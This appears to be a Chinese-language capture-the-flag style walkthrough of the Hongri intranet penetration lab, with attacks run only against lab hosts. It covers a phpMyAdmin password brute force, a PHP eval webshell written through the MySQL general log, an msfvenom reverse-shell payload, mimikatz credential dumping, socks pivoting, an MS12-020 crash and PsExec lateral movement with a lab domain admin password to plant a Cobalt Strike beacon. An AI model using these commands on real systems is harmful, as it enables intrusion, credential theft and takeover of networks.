Bootstrap

红日靶场--内网渗透练习

目录

环境介绍

 信息收集

 内网主机存活扫描

 masscan扫描 ​

 Nmap扫描

 访问80端口

 目录扫描

漏洞利用

探测phpstudy的phpmyadmin目录

 爆破数据库密码

phpmyadmin漏洞利用

查看能否写入文件

查看是否能写入日志

 执行一句话木马

蚁剑连接

信息收集

拿到webshell后进行信息收集

判断是否有域

后渗透

msf上线

 利用蚁剑上传木马

 msf信息收集

 提权

抓取域用户的密码信息 

 远程连接

 跨网段横向渗透

msf socks4a proxychains 穿透内网

sockscap64代理远程连接

 域内信息收集

跨网段主机信息收集

横向渗透

拿域成员

ms12-020攻击蓝屏

拿域控

msf派生给cs

cs基于web服务器生成监听器

 psexec64攻击


环境介绍

环境介绍:                                    内网
kali           192.168.171.137
win7           192.168.171.153         192.168.52.130    win7 web虚拟机 开启 phpstudy服务
win2003                                192.168.52.131
win2008                                192.168.52.138

 信息收集

 内网主机存活扫描

netdiscover -i eht0 -r 192.168.171.0/24

192.168.171.153则为目标机

 

 masscan扫描

masscan 192.168.171.0/24 -p 1-65535 --rate 1000
(rate的值越大可能会被封禁,适当调小些)

 

 Nmap扫描

nmap -O 192.168.171.153

 访问80端口

 目录扫描

dirsearch -u 192.168.171.153

漏洞利用

探测phpstudy的phpmyadmin目录

发现数据库登录框

 爆破数据库密码

密码为root

phpmyadmin漏洞利用

查看用户的权限

查看能否写入文件

mysql   into写入文件:使用需看要secure_file_priv的值。
	    value为“null”时,不允许读取任意文件
	    value为其余路径时,表示该路径可以读写文件
	    value为“空”时,允许读取任意文件

用show global variables like '%secure%' 命令查看

 是关闭的,不能执行写入文件

查看是否能写入日志

查看日志功能是否开启

show global variables like '%general%'

未开启的话设置为 on

set global general_log='ON'

开启后将日志文件的存储位置改为可访问到的根目录(phpstudy能看到根目录)

set global  general_log_file = 'C:/WWW/1.php'

执行下边一句话木马,数据库将会将查询语句保存在日志文件中

SELECT '<?php @eval($_POST["cmd"]); ?>'

写入成功后 使用蚁剑连接

 

 执行一句话木马

把它记录到日志里

蚁剑连接

 

 

连接成功

信息收集

拿到webshell后进行信息收集

判断是否有域

判断方法
查看网关IP地址、DNS的ip地址、域名、本机是否和DNS服务器处于同一网段等信息。


whoami
ipconfig /all
systeminfo


具体判断方法
https://blog.csdn.net/qq_36279445/article/details/110647055

 

发现一个新网段
192.168.52.130

 因为在域内 所以 有必要进行后渗透 拿下域控

后渗透

msf上线

生成exe木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.171.137 LPORT=2333 -f exe > hack.exe 

开启监听

use exploit/multi/handler 

set payload windows/meterpreter/reverse_tcp

set lport 2333

set lhost 192.168.171.137

 利用蚁剑上传木马

执行

 

利用成功

 

 msf信息收集

扫描同一网段主机
run arp_scanner -r 192.168.52.0/24
发现192.168.52.130存活,因为只开了一个VM2所以只扫到130

 提权

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM  最高权限所以不用提权

这个是正常提权

抓取域用户的密码信息 

加载mimikatz模块
Windows10/2012 以下的版本可以直接抓取明文密码
	再尝试加载 mimikatz 模块,加载模块前需要先将meterpreter迁移到64位的进程,
	而且该进程也需要 是system权限运行的。 
ps 查看进程
migrate PID 
load mimikatz 
creds_kerberos

mimikata的使用
cls:        清屏
standard:   标准模块,基本命令
crypto:     加密相关模块
sekurlsa:   与证书相关的模块
kerberos:   kerberos模块
privilege:  提权相关模块
process:    进程相关模块
service:    服务相关模块
lsadump:    LsaDump模块
ts:         终端服务器模块
event:      事件模块
misc:       杂项模块
token:      令牌模块
vault:      令牌操作模块
minesweepre:Mine Sweeper模块
dpapi:      DPAPI模块(通过API或RAW访问)[数据保护应用程序编程接口]
busyloght:  BusyLight Module
sysenv:     系统环境值模块
sid:        安全标识符模块
iis:        IIS XML配置模块
rpc:        mimikatz的RPC控制
sr98:       RDM(830AL)器件的射频模块
acr:        ACR模块
version:    查看版本
exit:       推出
creds_msv:  获取密码hash值
creds_kerberos:    获取密码明文

 远程连接

nmap -p 3389 192.168.171.153

发现端口关闭,用meterpreter打开
run post/windows/manage/enable_rdp

打开3389端口

run post/windows/manage/enable_rdp

 

 跨网段横向渗透

msf socks4a proxychains 穿透内网

添加路由
run autoroute -s 192.168.52.0/24
查看路由
run autoroute -p 
background  返回
route print  输出路由

use auxiliary/server/socks_proxy
这里说一下,msf5是有socks4a、5a的
           msf6是只有socks_proxy的,需要在options设置

set version 4a
set srvhost 192.168.171.137
set srvport 1080
run

 

配置 kali socks代理
配置proxychains:
vi/etc/proxychains.conf 

proxychains curl 192.168.52.130
访问成功 说明 代理添加成功
Proxychains nmap -sT -Pn 192.168.52.130
查看端口是否可以连接

 

sockscap64代理远程连接

 用户名前边要加上域

 

连接成功

 域内信息收集

net time /domain        #查看时间服务器
net user /domain        #查看域用户
net view /domain        #查看有几个域
net view /domain:GOD  #查看GOD	域情况
nslookup  主机名	 		#查看域内其他主机  可能ip查不出来
net group "domain computers" /domain         #查看域内所有的主机名
net group "domain admins"   /domain          #查看域管理员
net group "domain controllers" /domain       #查看域控

跨网段主机信息收集

auxiliary/scanner/discovery/udp_sweep    #基于udp协议发现内网存活主机
auxiliary/scanner/discovery/udp_probe    #基于udp协议发现内网存活主机
auxiliary/scanner/netbios/nbname         #基于netbios协议发现内网存活主机
proxychains nmap -Pn -sT 192.168.52.130
auxiliary/scanner/portscan/tcp           #基于tcp进行端口扫描(默认扫描1-10000)
auxiliary/scanner/ftp/ftp_version            #发现内网ftp服务,基于默认21端口
auxiliary/scanner/ssh/ssh_version            #发现内网ssh服务,基于默认22端口
auxiliary/scanner/telnet/telnet_version      #发现内网telnet服务,基于默认23端口
auxiliary/scanner/dns/dns_amp                #发现dns服务,基于默认53端口
auxiliary/scanner/http/http_version          #发现内网http服务,基于默认80端口
auxiliary/scanner/http/title                 #探测内网http服务的标题
auxiliary/scanner/smb/smb_version            #发现内网smb服务,基于默认的445端口   
auxiliary/scanner/mssql/mssql_schemadump     #发现内网SQLServer服务,基于默认的1433端口
auxiliary/scanner/oracle/oracle_hashdump     #发现内网oracle服务,基于默认的1521端口 
auxiliary/scanner/mysql/mysql_version        #发现内网mysql服务,基于默认3306端口
auxiliary/scanner/rdp/rdp_scanner            #发现内网RDP服务,基于默认3389端口
auxiliary/scanner/redis/redis_server         #发现内网Redis服务,基于默认6379端口
auxiliary/scanner/db2/db2_version            #探测内网的db2服务,基于默认的50000端口
auxiliary/scanner/netbios/nbname             #探测内网主机的netbios名字

横向渗透

拿域成员

ms12-020攻击蓝屏

打坏了

拿域控

是可以直接拿域控的,域成员坏了就坏了吧

msf派生给cs

use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http 
set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新 的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true 
set lhost 192.168.157.137 #cobaltstrike监听的ip 
set lport 14444 #cobaltstrike监听的端口 
set session 1 #这里是获得的session的id 
exploit

 利用cs直接生成蚁剑上传也可

 

 上线成功

cs基于web服务器生成监听器

 psexec64攻击

链接:https://pan.baidu.com/s/184mAAqriuoQ4crI5yABonA 
提取码:nail
通过蚁剑上传psexec64.exe 到web服务器

web执行 psexec命令

1.#上传木马文件
PsExec64.exe -accepteula \\192.168.52.138 -u god\administrator -p Hongrisec@2019 -d -c C:\windows\temp\beacon.exe
2.#打开 域控cmd  并执行 上线
PsExec64.exe -accepteula \\192.168.52.138 -u god\administrator -p Hongrisec@2019 -s cmd
cd..                 #返回到上级 c:/windows目录
dir | findstr beacon		#看是否上传beacon32.exe成功
beacon64.exe				#执行

域控主机上线成功

 拿下

;